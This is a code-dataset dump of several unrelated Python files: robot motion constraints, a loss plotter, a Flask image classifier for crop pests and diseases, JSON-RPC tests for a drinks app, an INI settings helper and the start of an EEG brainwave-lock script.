self.pt = _pt\r\n self.ax = _ax\r\n self.vec = _vec\r\n self.numConstraints = 1\r\n\r\n def constraint(self, frames, **kwargs):\r\n return [ 1-N.dot(frames[self.pt][:,self.ax],self.vec) ], []\r\n\r\nclass alignAxisGT(Constraint):\r\n def __init__(self, _pt, _ax, _vec, _gtv=.99):\r\n Constraint.__init__(self,0,1,False)\r\n self.pt = _pt\r\n self.ax = _ax\r\n self.vec = _vec\r\n self.gtv = _gtv\r\n self.numConstraints = 1\r\n def constraint(self, frames, **kwargs):\r\n return [], [ N.dot(frames[self.pt][:,self.ax],self.vec) - self.gtv ]\r\n\r\nclass Marker(Constraint):\r\n \"\"\"\r\n simplest possible constraint - a nail that doesn't actually connect to anything!\r\n \"\"\"\r\n def __init__(self, _position, _noZ=False):\r\n Constraint.__init__(self,True,False,_noZ)\r\n self.position = _position\r\n #CB - added code to set bounds and numConstraints (for equality uBound == lBound)\r\n if self.noZ:\r\n self.cUBounds = [0,0]\r\n else:\r\n self.cUBounds = [0,0,0]\r\n self.cLBounds = self.cUBounds\r\n assert len(self.cUBounds) == len(self.cLBounds)\r\n self.numConstraints = 0\r\n\r\n def constraint(self, **kwargs):\r\n if self.noZ:\r\n return [], []\r\n else:\r\n return [], []\r\n\r\n def __repr__(self):\r\n return \"\" % (self.pointID, self.position[0], self.position[1], self.position[2])\r\n\r\nclass AboveFloor(Constraint):\r\n \"\"\"\r\n simplest inequality - only works in Y\r\n \"\"\"\r\n def __init__(self, _pointID, _noZ, _floorHeight=0):\r\n Constraint.__init__(self, False, True, _noZ)\r\n self.pointID = _pointID\r\n self.floorHeight = _floorHeight\r\n #CB - added code to set bounds and numConstraints\r\n self.cUBounds = [float(\"inf\")]\r\n self.cLBounds = [0]\r\n assert len(self.cUBounds) == len(self.cLBounds)\r\n self.numConstraints = len(self.cUBounds)\r\n\r\n def constraint(self, points, **kwargs):\r\n return [], [ points[self.pointID][1]-self.floorHeight ]\r\n\r\nclass VariableBetween(Constraint):\r\n \"\"\"\r\n kindof like a joint limit - but implemented as a constraint\r\n \"\"\"\r\n def __init__(self, _varID, _minV, _maxV, _noZ):\r\n Constraint.__init__(self, False, True, _noZ)\r\n self.varID = _varID\r\n self.maxV = _maxV\r\n self.minV = _minV\r\n #CB - added code to set bounds and numConstraints\r\n self.cUBounds = [float(\"inf\"), float(\"inf\")]\r\n self.cLBounds = [0, 0]\r\n assert len(self.cUBounds) == len(self.cLBounds)\r\n self.numConstraints = len(self.cUBounds)\r\n\r\n def constraint(self, state, **kwargs):\r\n return [], [ state[self.varID]-self.minV, self.maxV-state[self.varID] ]\r\n\r\nclass StateVelocity(Constraint):\r\n \"\"\"\r\n makes sure a state variable is less than or equal to a max velocity\r\n _vMax is max velocity per frame (time parameterize frames outside the constraint)\r\n \"\"\"\r\n def __init__(self, _varID, _vMax, noZ=False):\r\n Constraint.__init__(self, False, True, noZ)\r\n self.varID = _varID\r\n self.vMax = _vMax\r\n self.usesStateDerivatives = 1\r\n #CB - added code to set bounds and numConstraints\r\n self.cUBounds = [float(\"inf\")]\r\n self.cLBounds = [0]\r\n assert len(self.cUBounds) == len(self.cLBounds)\r\n self.numConstraints = len(self.cUBounds)\r\n\r\n def constraint(self, stvel, **kwargs):\r\n return [], [self.vMax - abs(stvel[self.varID])]\r\n\r\nclass pointDistance(Constraint):\r\n \"\"\"\r\n makes sure a point is at least some distance from a fixed location\r\n \"\"\"\r\n def __init__(self, _pointID, _r, _x, _y, _z, noZ):\r\n Constraint.__init__(self, False, True, noZ)\r\n self.pointID = _pointID\r\n self.r = _r\r\n self.x = _x\r\n self.y = _y\r\n self.z = _z\r\n #CB - added code to set bounds and numConstraints\r\n self.cUBounds = [float(\"inf\")]\r\n self.cLBounds = [0]\r\n assert len(self.cUBounds) == len(self.cLBounds)\r\n self.numConstraints = len(self.cUBounds)\r\n\r\n\r\n def constraint(self, points, **kwargs):\r\n dx = self.x - points[self.pointID][0]\r\n dy = self.y - points[self.pointID][1]\r\n if self.noZ:\r\n dst = AD.MATH.sqrt(dx*dx+dy*dy)\r\n else:\r\n dz = self.z - points[self.pointID][2]\r\n dst = AD.MATH.sqrt(dx*dx+dy*dy+dz*dz)\r\n\r\n return [], [dst - self.r]\r\n\r\nclass allPointsDistance(Constraint):\r\n \"\"\"\r\n makes sure all points of a robot are at least some distance from a fixed location\r\n ignores the first points if you like\r\n \"\"\"\r\n def __init__(self, _r, _x, _y, _z, _noZ, _firstPoint=1,numPoints=None):\r\n Constraint.__init__(self, False, True, _noZ)\r\n self.first = _firstPoint\r\n self.r = _r\r\n self.x = _x\r\n self.y = _y\r\n self.z = _z\r\n #CB - added code to set bounds and numConstraints\r\n self.cUBounds = [float(\"inf\")] * numPoints\r\n self.cLBounds = [0] * numPoints\r\n assert len(self.cUBounds) == len(self.cLBounds)\r\n self.numConstraints = len(self.cUBounds)\r\n\r\n def constraint(self, points, **kwargs):\r\n lst = []\r\n for i in range(self.first,len(points)):\r\n dx = self.x - points[i][0]\r\n dy = self.y - points[i][1]\r\n if self.noZ:\r\n dst = AD.MATH.sqrt(dx*dx+dy*dy)\r\n else:\r\n dz = self.z - points[i][2]\r\n dst = AD.MATH.sqrt(dx*dx+dy*dy+dz*dz)\r\n lst.append(dst - self.r)\r\n return [], lst\r\n\r\n","sub_path":"RIK_simulator/src/lbd_playback/bin/Spacetime/constraint.py","file_name":"constraint.py","file_ext":"py","file_size_in_byte":8182,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"582411379","text":"# -*- coding:utf-8 -*-\nimport matplotlib.pyplot as plt\n\nwith open('log.txt') as file:\n train_loss = []\n val_loss = []\n logs = file.readlines()\n for log in logs:\n key = log.split(',')[2].split(':')[0]\n value = log.split(',')[2].split(':')[1]\n if key == ' loss':\n train_loss.append(float(value))\n elif key == ' val loss':\n val_loss.append(float(value))\n\n\nx = range(len(train_loss[::]))\nplt.plot(x,train_loss[::],color='blue',label='train loss')\n#plt.plot(x,val_loss,color='red',label='val loss')\nplt.legend()\nplt.show() \n","sub_path":"Vnet/loss_curve.py","file_name":"loss_curve.py","file_ext":"py","file_size_in_byte":581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"48756982","text":"import cv2\nimport numpy as np\nimport json\nimport os\nimport csv\nimport copy\nimport json\nfrom skimage import io\nfrom skimage import data\nfrom skimage import color\nfrom skimage.color import label2rgb\nfrom skimage.feature import canny\nfrom scipy import ndimage\nfrom skimage import morphology\nfrom skimage.filters import sobel,threshold_otsu, threshold_adaptive\nfrom skimage.util import img_as_ubyte\nfrom skimage.morphology import erosion, dilation, opening, closing, white_tophat\nfrom skimage.morphology import disk\nfrom skimage.feature import greycomatrix, greycoprops\nfrom skimage import measure\nfrom skimage.measure import label\nfrom flask.ext.cors import CORS, cross_origin\nfrom flask import Flask, request,g\nfrom mahotas.features import haralick\n\napp = Flask(__name__)\ncors = CORS(app)\n\nglobal pests\nglobal pestANN \nglobal diseases\nglobal diseaseANN\n\ndef getSpecies(filename):\n\tspecies=[]\n\twith open(filename,'rb') as f:\n\t\treader = csv.reader(f)\n\t\tfor row in reader:\n\t\t species.append(row[-1])\n\n\treturn species\n\ndef initANN(filename,species,nhidden,step_size,momentum,nsteps,max_err):\n\ttrainingdata=[]\n\twith open(filename,'rb') as f:\n\t reader = csv.reader(f)\n\t for row in reader:\n\t trainingdata.append(row[:-1])\n\tinputs = np.empty( (len(trainingdata), len(trainingdata[0])), 'float' )\n\n\tfor i in range(len(trainingdata)):\n\t a = np.array(list(trainingdata[i]))\n\t f = a.astype('float')\n\t inputs[i,:]=f[:]\n\n\ttargets= -1 * np.ones( (len(inputs), len(species)), 'float' )\n\n\ti=0\n\twith open(filename,'rb') as f:\n\t reader = csv.reader(f)\n\t for row in reader:\n\t targets[i][species.index(row[-1])]=1\n\t i=i+1\n\n\tninputs = len(trainingdata[0])#number of features\n\tnoutput = len(species)#number of classes\n\tlayers = np.array([ninputs, nhidden, noutput])\n\t\n\tnnet = cv2.ANN_MLP(layers)\n\n\tcondition = cv2.TERM_CRITERIA_COUNT | cv2.TERM_CRITERIA_EPS\n\tcriteria = (condition, nsteps, max_err)\n\t\n\tparams = dict( term_crit = criteria,train_method = cv2.ANN_MLP_TRAIN_PARAMS_BACKPROP,bp_dw_scale = step_size, bp_moment_scale = momentum )\n\tnum_iter = nnet.train(inputs,targets,None,params=params)\n\n\treturn nnet\n\t\n\t\ndef pestFeatureExtraction(filename):\n\tselem = disk(8)\n\timage = data.imread(filename,as_grey=True)\n\tthresh = threshold_otsu(image)\n\televation_map = sobel(image)\n\tmarkers = np.zeros_like(image)\n\n\tif ((image (image>thresh).sum()):\n\t\tmarkers[image < thresh] = 1\n\t\tmarkers[image > thresh] = 2\n\telse:\n\t\tmarkers[image < thresh] = 2\n\t\tmarkers[image > thresh] = 1\n\n\tsegmentation = morphology.watershed(elevation_map, markers)\n\tsegmentation = dilation(segmentation-1, selem)\n\tsegmentation = ndimage.binary_fill_holes(segmentation)\n\n\tsegmentation = np.logical_not(segmentation)\n\timage[segmentation]=0;\n\n\thist = np.histogram(image.ravel(),256,[0,1])\n\n\thist = list(hist[0])\n\thist[:] = [float(x) / (sum(hist) - hist[0]) for x in hist]\n\thist.pop(0)\n\n\tfeatures = np.empty( (1, len(hist)), 'float' )\n\t\n\ta = np.array(list(hist))\n\tf = a.astype('float')\n\tfeatures[0,:]=f[:]\n\n\treturn features\n\ndef checkPythonImage(img):\n\n\theight, width, depth = img.shape\n\tangle = 90\n\tif height > width:\n\t\timageCenter = tuple(np.array(img.shape)/2)\n\t\timg = ndimage.rotate(img, 90)\n\t \n\tbaseheight = 840\n\thpercent = (baseheight / float(width))\n\twsize = int((float(height) * float(hpercent)))\n\tresizeImg = cv2.resize(img, (800, 640))\n\n\treturn resizeImg\n\ndef checkPythonGrayImage(img):\n\n\theight, width = img.shape\n\tangle = 90\n\tif height > width:\n\t\timageCenter = tuple(np.array(img.shape)/2)\n\t\timg = ndimage.rotate(img, 90)\n\t \n\tbaseheight = 840\n\thpercent = (baseheight / float(width))\n\twsize = int((float(height) * float(hpercent)))\n\tresizeImg = cv2.resize(img, (800, 640))\n\n\treturn resizeImg\n\ndef diseaseFeatureExtraction(filename):\n\tselem = disk(8)\n\n\t#THRESHOLDING STUFFFFFFFFFFFFFFFFFFFFFFFFFFFF\n\timage = data.imread(filename)\n\timage = checkPythonImage(image)\n\n\thsv2 = cv2.cvtColor(image, cv2.COLOR_BGR2HSV)\n\n\tgrayimage = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n\tgrayimage = checkPythonGrayImage(grayimage)\n\n\tthresh = threshold_otsu(grayimage)\n\n\televation_map = sobel(grayimage)\n\n\tmarkers = np.zeros_like(grayimage)\n\n\tif ((grayimage (grayimage>thresh).sum()):\n\t\tmarkers[grayimage < thresh] = 1\n\t\tmarkers[grayimage > thresh] = 2\n\telse:\n\t\tmarkers[grayimage < thresh] = 2\n\t\tmarkers[grayimage > thresh] = 1\n\n\n\tsegmentation = morphology.watershed(elevation_map, markers)\n\n\tsegmentation = dilation(segmentation-1, selem)\n\tsegmentation = ndimage.binary_fill_holes(segmentation)\n\n\tsegmentation = np.logical_not(segmentation)\n\tgrayimage[segmentation]=0;\n\n\twatershed_mask = np.empty_like(grayimage, np.uint8)\n\twidth = 0\n\theight = 0\n\twhile width < len(watershed_mask):\n\n\t\twhile height < len(watershed_mask[width]):\n\n\t\t\tif grayimage[width][height] == 0:\n\t\t\t\twatershed_mask[width][height] = 0\n\t\t\telse:\n\t\t\t\twatershed_mask[width][height] = 1\n\n\t\t\theight += 1\n\t\t\tpass\n\n\t\twidth += 1\n\t\theight = 0\n\t\tpass\n\n\n\n\t#SPLITTING STUFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\n\timage = cv2.bitwise_and(image,image,mask = watershed_mask)\n\thsv = ''\n\tif image.shape[2] == 3:\n\t\thsv = color.rgb2hsv(image)\n\telif image.shape[2] == 4:\n\t\timage = cv2.cvtColor(image, cv2.COLOR_BGRA2BGR)\n\t\thsv = color.rgb2hsv(image)\n\th,s,v = cv2.split(hsv2)\n\n\t#MASKING STUFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF\n\tmask = cv2.inRange(h, 40, 80)\n\tcv2.bitwise_not(mask, mask)\n\n\tres = cv2.bitwise_and(image,image, mask= mask)\n\tres_gray = cv2.bitwise_and(grayimage,grayimage, mask=mask)\n\t\n\tharfeatures = haralick(res.astype(int), ignore_zeros=True, return_mean=True)\n\n\t#glcm = greycomatrix(res_gray, [5], [0], 256)\n\t#contrast = greycoprops(glcm, 'contrast')[0, 0]\n\t#ASM = greycoprops(glcm, 'ASM')[0, 0]\n\t#dissimilarity = greycoprops(glcm, 'dissimilarity')[0, 0]\n\t#homogeneity = greycoprops(glcm, 'homogeneity')[0, 0]\n\t#energy = greycoprops(glcm, 'energy')[0, 0]\n\t\n\tfeatures = []\n\t\n\t#features.append(contrast)\n\t#features.append(ASM) \n\t#features.append(dissimilarity)\n\t#features.append(homogeneity)\n\t#features.append(energy)\n\n\thist = cv2.calcHist([res],[0],None,[256],[0,256])\n\tw, h, c = res.shape\n\tnumPixel = w * h\n\n\tnum = 0\n\tfor index in hist:\n\n\t\tif num != 0 and num<255:\n\t\t\tfeatures.append(index[0]/(numPixel-hist[0][0]))\n\n\t\tnum = num + 1\n\n\t\tpass\n\n\tfor harfeature in harfeatures:\n\t\tfeatures.append(harfeature)\n\t\tpass\t\n\n\toutput = np.empty( (1, len(features)), 'float' )\n\t\n\ta = np.array(list(features))\n\toutput[0,:]=a[:]\n\treturn output\n\ndef predict(nnet,species,features):\n\tprediction = np.empty(shape=(1,len(species)))\n\tnnet.predict(features,prediction)\n\n\treturn prediction[0]\n\n\n@app.route(\"/pestImageSearch\",methods=[\"POST\"])\ndef pestImageSearch():\n\tfilename = request.form.get(\"filename\",\"\")\n\n\tpestFeatures = pestFeatureExtraction(filename)\n\n\tpestPrediction = predict(pestANN,pests,pestFeatures)\n\t\n\tsortedPestPrediction=np.argsort(pestPrediction)[::-1]\n\tpestData=[]\n\tfor i in xrange(0,5):\n\t\tpestData.append({'name':pests[sortedPestPrediction[i]],'confidence':pestPrediction[sortedPestPrediction[i]]})\n\n\t#result = {'data': pestData, 'features': pestFeatures[0].tolist() }\n\tresult = {'data': pestData}\n\n\treturn json.dumps(result)\n\n@app.route(\"/diseaseImageSearch\",methods=[\"POST\"])\ndef diseaseImageSearch():\n\tfilename = request.form.get(\"filename\",\"\")\n\n\tdiseaseFeatures = diseaseFeatureExtraction(filename)\n\n\tdiseasePrediction = predict(diseaseANN,diseases,diseaseFeatures)\n\t\n\tsortedDiseasePrediction=np.argsort(diseasePrediction)[::-1]\n\tdiseaseData=[]\n\tfor i in xrange(0,5):\n\t\tdiseaseData.append({'name':diseases[sortedDiseasePrediction[i]],'confidence':diseasePrediction[sortedDiseasePrediction[i]]})\n\t\n\t#result = {'data': diseaseData,'features':diseaseFeatures[0].tolist()}\n\n\tresult = {'data': diseaseData}\n\n\treturn json.dumps(result)\n\n@app.route(\"/addTrainingData\",methods=[\"POST\"])\ndef addTrainingData():\t\n\tflag = request.form.get(\"flag\",\"\")\n\tfilename = request.form.get(\"filename\",\"\")\n\t\n\tif flag != \"true\":\n\t\tos.remove(filename)\n\telse:\n\t\tclassification = request.form.get(\"type\",\"\")\n\t\ttarget = request.form.get(\"target\",\"\")\n\t\t\n\t\tDIR = \"pending/\"+classification+\"/\"+target\n\t\tif not os.path.exists(DIR):\n\t\t\tos.makedirs(DIR)\n\t\tindex = len([name for name in os.listdir(DIR) if os.path.isfile(os.path.join(DIR, name))])\n\t\t\n\t\tos.rename(filename,DIR+\"/\"+str(index)+\".jpg\")\n\n\treturn \"HAHAHAHAHAHA\"\n\n# @app.route(\"/pestAddTrainingData\",methods=[\"POST\"])\n# def pestAddTrainingData():\n# \tfeatures = request.form.get(\"input\",\"\")\n# \ttarget = request.form.get(\"target\",\"\")\n# \tfeatures = features.split(\",\")\n# \tfeatures = map(float, features)\n\t\n# \tinputs = np.empty( (1, len(features)), 'float' )\n# \ta = np.array(list(features))\n# \tf = a.astype('float')\n# \tinputs[0,:]=f[:]\n\n# \ttargets= -1 * np.ones( (1, len(pests)), 'float' )\n\n# \ttargets[0][pests.index(target)]=1\n\n# \tcondition = cv2.TERM_CRITERIA_COUNT | cv2.TERM_CRITERIA_EPS\n# \tcriteria = (condition, 900, 0.0000000001)\n\t\n# \tparams = dict( term_crit = criteria,train_method = cv2.ANN_MLP_TRAIN_PARAMS_BACKPROP,bp_dw_scale = 0.1, bp_moment_scale = 0.003 )\n\n# \t#pestANN.train(inputs,targets,None,params=params,flags=cv2.ANN_MLP_UPDATE_WEIGHTS)\n\n# \treturn \"HAHA\"\n\n# @app.route(\"/diseaseAddTrainingData\",methods=[\"POST\"])\n# def diseaseAddTrainingData():\n# \tfeatures = request.form.get(\"input\",\"\")\n# \ttarget = request.form.get(\"target\",\"\")\n# \tfeatures = features.split(\",\")\n# \tfeatures = map(float, features)\n\t\n# \tinputs = np.empty( (1, len(features)), 'float' )\n# \ta = np.array(list(features))\n# \tf = a.astype('float')\n# \tinputs[0,:]=f[:]\n\n# \ttargets= -1 * np.ones( (1, len(diseases)), 'float' )\n\n# \ttargets[0][diseases.index(target)]=1\n\n# \tcondition = cv2.TERM_CRITERIA_COUNT | cv2.TERM_CRITERIA_EPS\n# \tcriteria = (condition, 50000, 0.0000000001)\n\t\n# \tparams = dict( term_crit = criteria,train_method = cv2.ANN_MLP_TRAIN_PARAMS_BACKPROP,bp_dw_scale = 0.08, bp_moment_scale = 0.003 )\n\n# \t#diseaseANN.train(inputs,targets,None,params=params,flags=cv2.ANN_MLP_UPDATE_WEIGHTS)\n\n# \treturn \"HAHA\"\n\n\t\n\nif __name__ == \"__main__\":\n\tpests = getSpecies('pests.csv')\n\tpestANN = initANN('pesttraining.csv',pests, 90, 0.003, 0.1, 900, 0.0000000001)\n\t#diseases = getSpecies('diseases.csv')\n\t#diseaseANN = initANN('diseasetraining.csv',diseases, 64, 0.003, 0.08, 50000, 0.0000000001)\n\tapp.run(debug=True, host = '127.0.0.1')\n\t\n","sub_path":"api/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":10195,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"205991858","text":"#! /usr/bin/env python\nimport sys, os.path\nimport simplejson\nimport urllib2\nimport app, recipes\nimport StringIO\nimport collections\n\nsys.path.append(os.path.join(os.path.dirname(__file__), '..'))\n\nfrom drinkz import db\nfrom recipes import Recipe\n\ndef call_remote(method, params, id):\n d = dict(method = method, params = params, id = id)\n\n environ = {}\n environ['PATH_INFO'] = '/rpc'\n environ['REQUEST_METHOD'] = 'POST'\n environ['CONTENT_LENGTH'] = len(simplejson.dumps(d))\n environ['wsgi.input'] = StringIO.StringIO(simplejson.dumps(d))\n\n\n d={}\n\n def my_start_response(s, h, return_in = d):\n d['status'] = s\n d['headers'] = h\n\n app_obj = app.SimpleApp()\n results = app_obj(environ, my_start_response)\n\n status, headers = d['status'], d['headers']\n\n result = \"\".join(results)\n\n assert ('Content-Type', 'application/json') in headers\n assert status == '200 OK'\n\n return result\n\ndef test_json_convert_units_to_ml():\n conversion = call_remote('convert_units_to_ml', [\"1 gallon\"], '1')\n\n rpc_request = simplejson.loads(conversion)\n\n result = rpc_request['result']\n\n assert result == 3785.41, result\n\ndef test_json_get_recipe_names():\n make_test_db()\n\n names = call_remote('get_recipe_names', [], '1')\n\n rpc_request = simplejson.loads(names)\n\n result = rpc_request['result']\n\n correct_result = ['kraken destroyer', 'kraken and cola']\n\n assert collections.Counter(result) == collections.Counter(correct_result), result\n\ndef test_json_get_liquor_inventory():\n make_test_db()\n\n inventory = call_remote('get_liquor_inventory', [], 1)\n\n rpc_request = simplejson.loads(inventory)\n\n result = rpc_request['result']\n\n assert ['Kraken', 'dark spiced rum'] in result, result\n assert ['Bols', 'blue curacao'] in result, result\n assert ['Hypnotiq', 'original'] in result, result\n assert ['Uncle John\\'s', 'original cider'] in result, result\n\ndef make_test_db():\n db._reset_db()\n\n db.add_bottle_type('Kraken', 'dark spiced rum', 'dark spiced rum')\n db.add_to_inventory('Kraken', 'dark spiced rum', '750 ml')\n\n db.add_bottle_type('Bols', 'blue curacao', 'citrus liqeur')\n db.add_to_inventory('Bols', 'blue curacao', '500 ml')\n \n db.add_bottle_type('Hypnotiq', 'original', 'berry liqeur')\n db.add_to_inventory('Hypnotiq', 'original', '750 ml')\n\n db.add_bottle_type('Uncle John\\'s', 'original cider', 'apple cider')\n db.add_to_inventory('Uncle John\\'s', 'original cider', '1 g')\n\n kraken_destroyer = Recipe('kraken destroyer', [('dark spiced rum',\n '4.5 oz'), ('citrus liqeur', \n '1 oz'), ('berry liqeur', \n '1 oz'), ('apple cider', \n '8 oz')])\n db.add_recipe(kraken_destroyer)\n\n kraken_and_cola = Recipe('kraken and cola', [('dark spiced rum', '6 oz'),\n ('cola', '8 oz')])\n db.add_recipe(kraken_and_cola)\n\n","sub_path":"drinkz/test_jsonrpc.py","file_name":"test_jsonrpc.py","file_ext":"py","file_size_in_byte":3085,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"255922333","text":"from typing import List\r\nfrom enum import IntEnum\r\nimport configparser\r\nimport os\r\n\r\nimport helpers.settings_properties as prop\r\n\r\n\r\nclass BadIniException(Exception):\r\n pass\r\n\r\n\r\nclass PropertyOwner(type):\r\n def __new__(mcs, name, bases, attrs):\r\n # Ищет члены, унаследованные от Property и устанавливает им поля name в соответствии с инменем переменной\r\n for n, v in attrs.items():\r\n if issubclass(type(v), prop.Property):\r\n v.name = n\r\n return super(PropertyOwner, mcs).__new__(mcs, name, bases, attrs)\r\n\r\n\r\ndef add_properties_to_class(instance, a_properties):\r\n \"\"\"\r\n Создает новый класс со свойством prop_name типа propr, унаследованный от instance\r\n \"\"\"\r\n class_name = instance.__class__.__name__ + 'WithProperties'\r\n child_class = type(class_name, (instance.__class__,), a_properties)\r\n instance.__class__ = child_class\r\n\r\n\r\nclass Settings(metaclass=PropertyOwner):\r\n\r\n class ValueType(IntEnum):\r\n INT = 0\r\n FLOAT = 1\r\n LIST_FLOAT = 2\r\n LIST_INT = 3\r\n STRING = 4\r\n BYTES = 5\r\n\r\n class VariableInfo:\r\n def __init__(self, a_name: str, a_section: str, a_type, a_default=None):\r\n self.name = a_name\r\n self.section = a_section\r\n self.type_ = a_type\r\n self.default = a_default\r\n\r\n def __init__(self, a_ini_path, a_variables: List[VariableInfo]):\r\n self.ini_path = a_ini_path\r\n self.settings = configparser.ConfigParser()\r\n\r\n self.__variables = {}\r\n self.__sections = set()\r\n\r\n for variable in a_variables:\r\n self.add_variable(variable)\r\n add_properties_to_class(self, self.__variables)\r\n\r\n self.restore()\r\n\r\n def add_variable(self, a_variable_info: VariableInfo):\r\n if a_variable_info.type_ == Settings.ValueType.LIST_FLOAT:\r\n self.__variables[a_variable_info.name] = prop.ListOfFloatProperty(\r\n self.ini_path, self.settings, a_variable_info.section, a_variable_info.default)\r\n elif a_variable_info.type_ == Settings.ValueType.LIST_INT:\r\n self.__variables[a_variable_info.name] = prop.ListOfIntProperty(\r\n self.ini_path, self.settings, a_variable_info.section, a_variable_info.default)\r\n elif a_variable_info.type_ == Settings.ValueType.FLOAT:\r\n self.__variables[a_variable_info.name] = prop.FloatProperty(\r\n self.ini_path, self.settings, a_variable_info.section, a_variable_info.default)\r\n elif a_variable_info.type_ == Settings.ValueType.INT:\r\n self.__variables[a_variable_info.name] = prop.IntProperty(\r\n self.ini_path, self.settings, a_variable_info.section, a_variable_info.default)\r\n elif a_variable_info.type_ == Settings.ValueType.STRING:\r\n self.__variables[a_variable_info.name] = prop.StringProperty(\r\n self.ini_path, self.settings, a_variable_info.section, a_variable_info.default)\r\n elif a_variable_info.type_ == Settings.ValueType.BYTES:\r\n self.__variables[a_variable_info.name] = prop.BytesProperty(\r\n self.ini_path, self.settings, a_variable_info.section, a_variable_info.default)\r\n else:\r\n assert False, \"Settings: Нереализованный тип\"\r\n\r\n self.__sections.add(a_variable_info.section)\r\n\r\n def add_ini_section(self, a_name: str):\r\n if not self.settings.has_section(a_name):\r\n self.settings.add_section(a_name)\r\n\r\n def restore(self):\r\n try:\r\n if not os.path.exists(self.ini_path):\r\n self.save()\r\n\r\n for section in self.__sections:\r\n self.add_ini_section(section)\r\n\r\n self.settings.read(self.ini_path)\r\n\r\n except configparser.ParsingError:\r\n raise BadIniException\r\n\r\n def save(self):\r\n with open(self.ini_path, 'w') as config_file:\r\n self.settings.write(config_file)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n # Пример использования\r\n a = Settings(\"./test_settings.ini\", [\r\n Settings.VariableInfo(a_name=\"list_float\", a_section=\"PARAMETERS\", a_type=Settings.ValueType.LIST_FLOAT),\r\n Settings.VariableInfo(a_name=\"list_int\", a_section=\"PARAMETERS\", a_type=Settings.ValueType.LIST_INT),\r\n Settings.VariableInfo(a_name=\"float1\", a_section=\"PARAMETERS\", a_type=Settings.ValueType.FLOAT, a_default=123.),\r\n Settings.VariableInfo(a_name=\"int1\", a_section=\"PARAMETERS\", a_type=Settings.ValueType.INT, a_default=222),\r\n Settings.VariableInfo(a_name=\"str1\", a_section=\"PARAMETERS\", a_type=Settings.ValueType.STRING, a_default=\"haha\")\r\n ])\r\n\r\n print(a.list_float, a.list_int, a.float1, a.int1, a.str1)\r\n\r\n a.list_float = [31., 33., 333.]\r\n a.list_int = [11, 2, 3]\r\n a.float1 = 11.\r\n a.int1 = 331\r\n a.str1 = \"he1he\"\r\n\r\n print(a.list_float, a.list_int, a.float1, a.int1, a.str1)\r\n","sub_path":"helpers/settings_ini_parser.py","file_name":"settings_ini_parser.py","file_ext":"py","file_size_in_byte":5090,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"399332202","text":"################## 项目名称: “Mind Locker:一种基于神经网络与深度学习的脑纹锁系统” ####################\n\n################## 拟解决的关键问题 #####################\n'''\n目前所采用的主流生物特征加密与识别,如指纹/瞳孔/人脸识别,因其易于伪造,特征值数量有限以及重复率高等因素,几乎一一被攻克,安全性受到极大挑战。比如,目前英伟达GAN人工智能的虚拟人脸生成技术,几乎攻陷了目前所有人脸识别系统。所以,在一些对安全性要求极高的应用场合(如巨额银行转账,进出军事领域等),传统生物特征加密方法的安全性,已经受到了严重的挑战。除人脸,瞳孔,指纹识别外,我们还有其他更为先进与安全的生物特征加密手段么? 答案是:大脑。每个人的大脑,其生物特征都是真正意义上的独一无二。利用脑电波的生物特征作为一种加密手段,这就是我现在所设计的一种基于深度学习/神经网络的脑纹加密与识别技术-“Mind Locker\",它具备如下特征:\n\n1.\t采用全连接深度学习神经网络,架构简洁,训练时长短,从脑电波EEG采样到训练并设置完毕仅需时2~3分钟。每次识别验证则仅需时8~10秒。\n2.\t采样过程中,可通过想象某一画面/场景/事物等,以增加其加密复杂度。\n3.\t识别正确率极高,几乎接近100%。\n4.\t安全性极高,因为脑电波是持续动态变化的连续帧数据流,而非指纹/人脸等静态特征值,所以伪匹配的可能性几乎为零。\n\n\n'''\n################ 主要创意点 革新点 与建议 ################\n'''\n脑电波EEG生物特征复杂,每一帧EEG均包含24条生物特征值(5频段的电平峰值/均值/实时值,8通道的EMG值,Focus值),且所有特征值均处于动态变化中,它们相互之间的非线性数学关系一起构成了这颗大脑的完整生物特征网。系统设计的核心在于学习与提取出这24条特征值相互间的全连接动态数学关系。如需破解,则必须完全再现此动态数学关系,且能在伪数据流的所有帧中维持此关系,所以几乎不存在破解的可能性。\n\n借助目前神经网络的深度学习技术,我实现了让计算机去学习与提取上述数学关系,达到了99.9%以上的识别率。训练样本为实时采集的2k帧EEG数据,陪训样本为4k帧随机抽取的EEG样本库(样本库采集自学校500名同学)。神经网络结构为[input:24*240*240*240*1:output], 训练规模为200帧*200次。隐藏层采用Relu激活函数。输出层采用Sigmoid激活函数形成逻辑回归判断。\n\n服务端数据采集系统为OpenBCI(语言:Processing),客户端AI框架为 Keras+Tensorflow(语言:Python)。\n\n硬件基于OpenBCI传感器,核心为 美国TI德州仪器ADS1299采样芯片(8通道,16khz,24bits) \n\n\n'''\n\nimport sys\nimport socket \nfrom PyQt5.QtWidgets import QApplication , QMainWindow\n#class Ui_MainWindow(QtWidgets.QMainWindow): #用这个替换Ui_Mind_locker_Ui.py 的 class Ui_MainWindow(object):\n\nfrom Ui_Mind_Locker_Ui import *\nimport numpy as np\nimport random\nfrom PyQt5.QtWidgets import QFileDialog\nfrom PyQt5.QtCore import QFileInfo\n#import qdarkstyle\n\nfrom keras.models import Sequential, Model,load_model\nfrom keras.layers.core import Dense, Dropout,Activation,regularizers\nfrom keras.optimizers import RMSprop\nfrom keras.utils import np_utils\nfrom keras.callbacks import TensorBoard\n\n#################### 全局超参数 ##############################\ntotal_EEG_data_number=1000 #读取n条EEG数据\ntotal_EEG_Features=24 #这是固定的。每一条EEG数据都有24个参数值。\ntraining_times=200 #训练的次数\ntraining_batch_size=200 #每次训练输入的EEG帧数\ntotal_EEG_data_number_for_test=50 #每次检测所采样的EEG帧数\nserver_address='127.0.0.1'\nstep=1 #此参数是:action()的操作的步骤的标志。\nfilename=''\ndirectly_load_filename=''\nmatch_triger=0.99 #此参数设置了每一帧的通过测试的阀门值。\ntotal_EEG_data_number_times=20\ndirectly_load_model_flag=False #此参数是:是否直接读取预训练模型的标志。\n\ndef action(): 